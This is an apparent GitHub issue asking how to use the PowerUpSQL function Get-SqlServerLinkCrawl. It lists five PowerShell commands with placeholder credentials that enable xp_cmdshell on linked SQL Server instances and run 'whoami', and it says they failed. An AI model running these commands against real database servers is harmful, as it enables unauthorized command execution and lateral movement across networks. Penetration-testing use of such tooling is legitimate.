Document the Syntax for Get-SqlServerLinkCrawl

Open aress31 opened this issue 3 years ago • 0 comments

I spent some time trying to figure out the correct syntax to use with Get-SqlServerLinkCrawl to enable xp_cmdshell and run system commands on all the DBs on the links, but no luck. I gave up and switched to impacket mssql instead.

The commands I tried are as follows:

```powershell
Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" `
    -Query "EXECUTE('sp_configure ''show advanced options'', 1')"
Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" `
    -Query "EXECUTE('RECONFIGURE')"
Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" `
    -Query "EXECUTE('sp_configure xp_cmdshell, 1')"
Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" `
    -Query "EXECUTE('RECONFIGURE')"
Get-SQLServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" `
    -Query "EXECUTE('xp_cmdshell whoami')"
```

If someone could please let me know what is wrong with the above, that would be super!

aress31, Aug 03 '22 14:08